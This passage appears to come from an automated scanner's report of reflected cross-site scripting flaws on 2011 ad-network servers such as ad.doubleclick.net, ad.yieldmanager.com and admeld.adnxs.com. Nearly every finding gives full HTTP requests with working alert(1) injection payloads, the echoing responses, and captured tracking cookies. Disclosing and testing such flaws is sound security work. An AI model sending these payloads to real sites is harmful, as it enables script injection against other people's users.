Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 299
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Mar 2011 11:59:49 GMT
Expires: Tue, 08 Mar 2011 11:59:49 GMT
Connection: close
The value of the dc_ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd04'%3balert(1)//df8038a084e was submitted in the dc_ref parameter. This input was echoed as cdd04';alert(1)//df8038a084e in the application's response: the server URL-decodes %3b to a semicolon, so the quote closes the string literal, the semicolon ends the statement, alert(1) runs as a statement of its own, and // comments out the rest of the original line. Unlike the '-alert(1)-' probes used elsewhere in this report, this variant does not rely on the surrounding expression tolerating an arithmetic operator.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/test.gmaps/business;dc_ref=cdd04'%3balert(1)//df8038a084e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://maps.google.com/mapfiles/ads/pp_dfp_ads_20100528.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 321
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Mar 2011 01:23:42 GMT
Expires: Tue, 08 Mar 2011 01:23:42 GMT
1.29. http://ad.doubleclick.net/adj/test.gmaps/business [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/test.gmaps/business
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25dd4'-alert(1)-'524a5a4183f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/test.gmaps/business?25dd4'-alert(1)-'524a5a4183f=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 316
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 08 Mar 2011 11:59:52 GMT
Expires: Tue, 08 Mar 2011 11:59:52 GMT
Connection: close
1.30. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bcfe"-alert(1)-"519b47b4f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=160x600&section=1597598&6bcfe"-alert(1)-"519b47b4f9c=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x30bfc3.js&size_id=9&account_id=7469&site_id=12005&size=160x600
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=23d97e10-394a-11e0-a408-001b24935f22&_hmacv=1&_salt=3386971552&_keyid=k1&_hmac=386c7ba4901acee5aa0724e9ce3af05518ef0c8b; pv1="b!!!!.!!L7_!*:n8!$0c3!,+ZH!#WUL!!!!$!?5%!(KYu6!wDW,!%JFh!%Oo9!$8eI~~~~~<o,,><s?nHM.jTN!#819~!$gwk!0E=#!%G'u!!!!$!?5%!$Tey-!ZZ<)!!jYm!'Mrt~~~~~~<p%L'~M.jTN!#tBx!+*gd!$6O/!0H/O!%G[Z!!H<'!!?5%'2^c6!wVd.!%QRf!!ayK!'N^l~~~~~<pN(@~~!#R%`!!!v!!$P2D!0con!$q^.!!H<'!#W(2)HM3:!ZmB)!'%%+!%g*K~~~~~~<pv08<qtnR!!!([!!qy:!!!%O!#26@!0QKk!$6[3~!#My1)eIbA!?vQ,!$%GC~~~~~~~<pk#S<qibm!!!([!#LXe!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~~!#LXr!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#LY.!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~M.jTN!#Lb-!+*gd!$6O/!,?Kj!$M=4!#:m1!?5%!'2^c5!wVd.!%QRf!%?,K!%?+N~~~~~<pN)1~!!xa=!#P,C!-8F-!$V-H!0.2@!$u#J!!!!$!?5%!%QX7/!@Dj0!'%it~~~~~~~<pqfN<qpLh!!!([!!LV3!-8F-!$V-H!,Dln!$tyI!!H<)!?5%!%QX7/!@Dj0!'%it~~~~~~~<pqk'<qpQA!!!(["; ih="b!!!!?!%?RR!!!!#<pqk,!%?m7!!!!#<p]i+!'cGC!!!!#<nQH-!'cKt!!!!$<nQH1!(4uP!!!!#<p^*H!)AU7!!!!#<pN(R!*rnf!!!!#<pv/a!,+ZH!!!!#<o,,>!,?Kj!!!!$<pN)1!,@lO!!!!#<nQHP!,@rl!!!!%<nQHf!,@s)!!!!#<nQHQ!,A*-!!!!$<pj[S!,Dln!!!!#<pqk'!->hZ!!!!#<pv0=!-fc'!!!!#<pd]p!.`.U!!!!#<o'YF!0(6l!!!!#<p]b^!0.2@!!!!#<pqfN!0E=#!!!!#<p%L'!0H/O!!!!$<pN(@!0QKi!!!!#<p]Te!0QKk!!!!$<pk#S!0QLr!!!!#<pN(S!0cn,!!!!#<p]aI!0con!!!!%<pv08!0coo!!!!#<p]rg"; cafb=/)2(Js!!94KE2!IIkB/eII<Uu; bh="b!!!%*!!!?I!!!!,<q)L@!!%#4!!7(q<o_%.!!)Qf!!!!(<nTlX!!*cu!!!!/<q)L@!!*oY!!!!%<pN)4!!+Vp!!!!#<pqhD!!-?2!!!!*<pN)4!!-L3!!!!#<pqhD!!-LP!!!!#<pqhD!!-Oo!!!!#<nsgt!!/DA!!!!/<q)L@!!/Hd!!!!.<q)L@!!/He!!!!.<q)L@!!/j$!!!!%<nTlW!!/pv!!!!#<pqhD!!0O0!!!!#<pqhD!!1CD!!!!#<p]be!!1Mv!!!!'<nZs,!!1N=!!!!$<nZs,!!1SP!!!!#<nsm5!!2-O!!!!(<nTlW!!2P@!!!!#<nAv8!!3):!!!!1<q)L@!!3)?!!!!1<q)L@!!3)C!!!!1<q)L@!!4@a!!!!#<q)L?!!4oZ!!!!#<nA,w!!?VS!!7(q<o_%.!!M=.!!!!)<pjWE!!Mev!!!!#<oa?r!!MfS!!!!'<oaA%!!N8v!!!!#<pqhD!!PKh!!!!#<okyj!!PL)!!!!%<okyj!!PL`!!!!'<okyj!!R`u!!!!#<q)L@!!Ra#!!!!#<q)L@!!Ra)!!!!#<q)L@!!UHs!!!!(<pLo`!!Vj^!!!!%<pLoI!!X*c!!!!#<pBKB!!X41!!!!%<pLo[!!Zwb!!!!/<pN)4!!bu:!!!!)<pjWE!!g]F!!!!#<pqhD!!itb!!!!2<q)L@!!j,.!!<NC<nYX3!!jW8!!!!)<pjWE!!nAU!!!!#<pqhD!!pkJ!!!!2<q)L@!!pkL!!!!2<q)L@!!qrq!!!!2<q)L@!!qrr!!!!2<q)L@!!qrv!!!!2<q)L@!!qyo!!!!.<q)L@!!st`!!!!(<nA,e!!u2f!!!!#<nA,G!!uhi!!!!#<pqhD!!waQ!!!!#<pqhD!!xw:!!!!#<pqhD!!yXN!!!!#<nAwa!!yaE!!!!)<pjWE!!yq?!!!!#<pOO/!##ah!!!!#<pqhD!#(mB!!!!#<pryM!#(x0!!!!(<pLo[!#+x/!!!!#<nQdW!#.dO!!!!)<pjWE!#0mN!!!!#<nAwa!#16I!!<NC<nYX3!#17A!!7(q<o_%.!#2.i!!!!#<okyj!#2Ic!!!!(<oaA$!#2Id!!!!%<oaA!!#3[#!!!!$<nQHk!#3pS!!!!#<p,e4!#3pv!!!!#<p,e4!#3pw!!!!#<pryM!#4ue!!!!#<p3Y1!#5(U!!!!#<pjT1!#5(W!!!!#<piFJ!#5(Y!!!!#<pjTA!#5(^!!!!#<pjT1!#5(a!!!!#<piFJ!#5(c!!!!#<piFJ!#5f*!!!!#<p2A7!#6Ty!!!!#<oDg4!#89b!!!!#<pqh_!#C-Y!!!!#<q*sU!#I=D!!!!$<pd+P!#K?^!!!!'<p_19!#L*a!!!!2<q)L@!#LI/!!!!#<p]be!#MTC!!!!2<q)L@!#MTF!!!!)<pv/h!#MTH!!!!2<q)L@!#MTI!!!!2<q)L@!#MTJ!!!!2<q)L@!#M]c!!!!)<pjWE!#O60!!!!#<nAwa!#O@M!!<NC<nYX3!#OWV!!!!$<ol!U!#OWX!!!!#<ol!J!#O^a!!!!#<nAv8!#P8A!!!!#<nAv8!#Q*T!!!!)<pjWE!#Q+/!!!!)<pjWE!#Q+^!!!!)<pjWE!#Q+p!!!!)<pjWE!#Q,.!!!!#<pjWF!#Qh8!!!!#<pryM!#QhF!!!!#<q*sU!#QpI!!!!/<q)L@!#QpJ!!!!/<q)L@!#QpL!!!!/<q)L@!#QpS!!!!/<q)L@!#QpU!!!!/<q)L@!#RU?!!!!2<q)L@!#RUA!!!!2<q)L@!#RY.!!!!)<pjWE!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#SEW!!!!#<p2A7!#Sq>!!!!#<nrb9!#T-b!!!!2<q)L@!#TnE!!!!2<q)L@!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!-<q)L@!#U@x!!!!-<q)L@!#UA$!!!!-<q)L@!#UDQ!!!!)<pv/h!#UW*!!!!#<pryM!#V,1!!!!#<pqhD!#VRb!!!!#<nAv7!#XA!!!!!)<pjWE!#XI9!!!!#<q)LA!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#[Qv!!!!#<pqhD!#]#G!!!!#<pqev!#](K!!!!#<o,+N!#]Ub!!!!0<q)L@!#]Uc!!!!0<q)L@!#]Ud!!!!0<q)L@!#]Ue!!!!0<q)L@!#]Uf!!!!0<q)L@!#]Ug!!!!0<q)L@!#]Uh!!!!0<q)L@!#]Ui!!!!0<q)L@!#]Uj!!!!0<q)L@!#]Uk!!!!0<q)L@!#]Ul!!!!0<q)L@!#]Um!!!!0<q)L@!#]Un!!!!0<q)L@!#]Uo!!!!0<q)L@!#]Up!!!!0<q)L@!#]Us!!!!0<q)L@!#]Uy!!!!0<q)L@!#]W%!!!!)<pjWE!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!%<pv/h!#]w<!!!!%<pv/h!#]wX!!!!%<pv/h!#]w[!!!!%<pv/h!#]wf!!!!%<pv/h!#]wp!!!!%<pv/h!#^Bo!!!!)<pjWE!#^c@!!!!)<pv/h!#^cm!!!!)<pv/h!#^f#!!!!.<q)L@!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aK:!!!!#<p%Ky!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=(!!!!#<piFJ!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#cAT!!!!#<q*to!#dX>!!!!#<o`%d!#eU%!!!!)<pjWE!#e_K!!!!$<pqfP!#f8c!!!!)<pjWE!#f__!!!!#<pd^@!#g)H!!!!)<pv/h!#g)I!!!!)<pv/h!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!)<pv/h!#g)P!!!!)<pv/h!#g)Q!!!!)<pv/h!#g)R!!!!)<pv/h!#g)S!!!!)<pv/h!#g)T!!!!)<pv/h!#g)U!!!!)<pv/h!#g)V!!!!)<pv/h!#g)W!!!!)<pv/h!#g)X!!!!)<pv/h!#g)Y!!!!)<pv/h!#g)Z!!!!)<pv/h!#g)[!!!!)<pv/h!#g)]!!!!)<pv/h!#g)^!!!!)<pv/h!#gHm!!!!)<pjWE!#g[h!!!!)<pjWE!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!)<pv/h!#gb5!!!!0<q)L@!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#l#]!!!!#<pd+P!#l*=!!!!)<pjWE!#nEj!!!!0<q)L@!#p#H!!!!)<pjWE!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!0<q)L@!#qF%!!!!)<pv/h!#qF'!!!!)<pv/h!#qUW!!!!0<q)L@!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!0<q)L@!#sXy!!!!$<pv+`!#so_!!!!#<p]be!#t:@!!!!$<nZs,!#tM)!!!!(<pv/h!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#uJR!!!!%<pv/h!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!0<q)L@!#w!A!!!!0<q)L@!#w!B!!!!0<q)L@!#w!C!!!!0<q)L@!#w!D!!!!0<q)L@!#w!F!!!!0<q)L@!#w!G!!!!0<q)L@!#w!I!!!!0<q)L@!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#xI*!!!!)<pjWE!#xUM!!!!*<q)L@"; BX=6l13v316lnh2l&b=4&s=8i&t=47
Response
HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 00:58:21 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 08 Mar 2011 00:58:21 GMT
Pragma: no-cache
Content-Length: 4648
Age: 0
Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.yieldmanager.com/imp?6bcfe"-alert(1)-"519b47b4f9c=1&Z=160x600&s=1597598&_salt=2079337496";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A ...[SNIP]...
1.31. http://ad3.liverail.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://ad3.liverail.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b52ff<a>25841ea6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?b52ff<a>25841ea6f9=1 HTTP/1.1 Host: ad3.liverail.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lr_uid=98718040;
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache Expires: Tue, 29 May 1984 15:00:00 GMT Content-type: text/xml; charset=UTF-8 Connection: close Date: Tue, 08 Mar 2011 12:00:03 GMT Server: lighttpd/1.4.26-devel-3M Content-Length: 184
<?xml version="1.0" encoding="utf-8"?> <liverail content='error' version='3.0-10.194.157.219'><message>Publisher ID missing (/1//10.194.157.219/b52ff<a>25841ea6f9)</message></liverail>
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73547'%3balert(1)//76e8989e0ad was submitted in the admeld_adprovider_id parameter. This input was echoed as 73547';alert(1)//76e8989e0ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 556cc'%3balert(1)//67076682b5c was submitted in the admeld_callback parameter. This input was echoed as 556cc';alert(1)//67076682b5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 213a1'-alert(1)-'e329b3b055a was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /usersync?calltype=admeld&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=193213a1'-alert(1)-'e329b3b055a&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIItpsBEAoYASABKAEwhNzQ6wQQhNzQ6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfw)*g>E9G)^w'db[wa]4dhBuV`GAFslJwp]L<J.9LI^n+5g7eUr#?b<4C)$Z5Z=xTluBk:eiK-Q'.whnauT$86Pd7Ck4BQhCI[ivg=pJ+YAOK+Y9V/4<ih)v)O?esGF)Rg50mIV#zZ6!5!RzB<G5c@xPK3]W[.B#8TJpd<HJWBwur<!u!$aJVL+3d)_yOPvwDAeDo>U.2<rWlT[a#!1DAkeE/C)/N*Yt.Qe8Ycq!MV7/xC`6hqLSM-.Jn69]E!69Q%rQHJ'lwCd8Et+.r$t@:dM^Sk]scstnXG2n3]SvMTQb!sN6MYd-+='ihI^k_Q=UwG:q)zNxacpTj/*V#lI`u.ocu#skfo4RJFZC_+]J<w6>^@'C9=W'w(ndZjdS#f%mcJxPrsGj(Gs*ZmED#C>DVkH5<v3a>/k3?_SP7fRHejoSEJS=nE4hF*5?u?s5v/3/gVBpVvbXw>95_BNXC]efSp1X#=V1nH24u0(_Yyqob%utI:C9>SkJCT4%b(.*oDLNk^<!z$Q/TeJt][Xe'%GrWh_2:Iq*3Rp=B8hxV/MtMn'9JN4IT>8e
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 08-Mar-2011 01:58:40 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sun, 05-Jun-2011 01:58:40 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 01:58:40 GMT Content-Length: 183
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9729'-alert(1)-'28e4793a760 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /usersync?calltype=admeld&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf9729'-alert(1)-'28e4793a760 HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIItpsBEAoYASABKAEwhNzQ6wQQhNzQ6wQYAA..; sess=1; uuid2=4470455573253905340; anj=Kfw)*g>E9G)^w'db[wa]4dhBuV`GAFslJwp]L<J.9LI^n+5g7eUr#?b<4C)$Z5Z=xTluBk:eiK-Q'.whnauT$86Pd7Ck4BQhCI[ivg=pJ+YAOK+Y9V/4<ih)v)O?esGF)Rg50mIV#zZ6!5!RzB<G5c@xPK3]W[.B#8TJpd<HJWBwur<!u!$aJVL+3d)_yOPvwDAeDo>U.2<rWlT[a#!1DAkeE/C)/N*Yt.Qe8Ycq!MV7/xC`6hqLSM-.Jn69]E!69Q%rQHJ'lwCd8Et+.r$t@:dM^Sk]scstnXG2n3]SvMTQb!sN6MYd-+='ihI^k_Q=UwG:q)zNxacpTj/*V#lI`u.ocu#skfo4RJFZC_+]J<w6>^@'C9=W'w(ndZjdS#f%mcJxPrsGj(Gs*ZmED#C>DVkH5<v3a>/k3?_SP7fRHejoSEJS=nE4hF*5?u?s5v/3/gVBpVvbXw>95_BNXC]efSp1X#=V1nH24u0(_Yyqob%utI:C9>SkJCT4%b(.*oDLNk^<!z$Q/TeJt][Xe'%GrWh_2:Iq*3Rp=B8hxV/MtMn'9JN4IT>8e
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 08-Mar-2011 02:02:38 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4470455573253905340; path=/; expires=Sun, 05-Jun-2011 02:02:38 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Mon, 07 Mar 2011 02:02:38 GMT Content-Length: 183
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70f21'%3balert(1)//e154bfaf813 was submitted in the admeld_adprovider_id parameter. This input was echoed as 70f21';alert(1)//e154bfaf813 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clicksense/admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=7370f21'%3balert(1)//e154bfaf813&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2tm6jj5l0la
Response
HTTP/1.1 200 OK Cache-control: no-cache, no-store Content-Type: text/plain Date: Mon, 07 Mar 2011 01:49:40 GMT P3P: CP=NOI ADM DEV CUR Pragma: no-cache Server: Apache-Coyote/1.1 Set-Cookie: 2=2tm6jj5l0la; Domain=.lucidmedia.com; Expires=Tue, 06-Mar-2012 01:49:40 GMT; Path=/ Content-Length: 192 Connection: keep-alive
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac52f'%3balert(1)//d88f1d56111 was submitted in the admeld_callback parameter. This input was echoed as ac52f';alert(1)//d88f1d56111 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /clicksense/admeld/match?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchac52f'%3balert(1)//d88f1d56111 HTTP/1.1 Host: admeld.lucidmedia.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_300_TOP&groupid=5267702644&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 2=2tm6jj5l0la
Response
HTTP/1.1 200 OK Cache-control: no-cache, no-store Content-Type: text/plain Date: Mon, 07 Mar 2011 01:50:48 GMT P3P: CP=NOI ADM DEV CUR Pragma: no-cache Server: Apache-Coyote/1.1 Set-Cookie: 2=2tm6jj5l0la; Domain=.lucidmedia.com; Expires=Tue, 06-Mar-2012 01:50:49 GMT; Path=/ Content-Length: 192 Connection: keep-alive
1.38. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.bluelithium.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c277"-alert(1)-"0cd1e690ae8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=728x90&section=1547458&9c277"-alert(1)-"0cd1e690ae8=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/creative.php?pageid=General&placement=MW_GEN_728_BOT&groupid=1123043650&quantseg=D:T:2884:2775:1799:1361:1360:1355:1353:1349:1345:1343:1340&keyword=&subjcode= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 07 Mar 2011 01:36:21 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Mon, 07 Mar 2011 01:36:21 GMT Pragma: no-cache Content-Length: 4645 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9c277"-alert(1)-"0cd1e690ae8=1&Z=728x90&s=1547458&_salt=1004587447";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar ...[SNIP]...
The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72088"%3balert(1)//e3ee0a1bc3b was submitted in the r parameter. This input was echoed as 72088";alert(1)//e3ee0a1bc3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
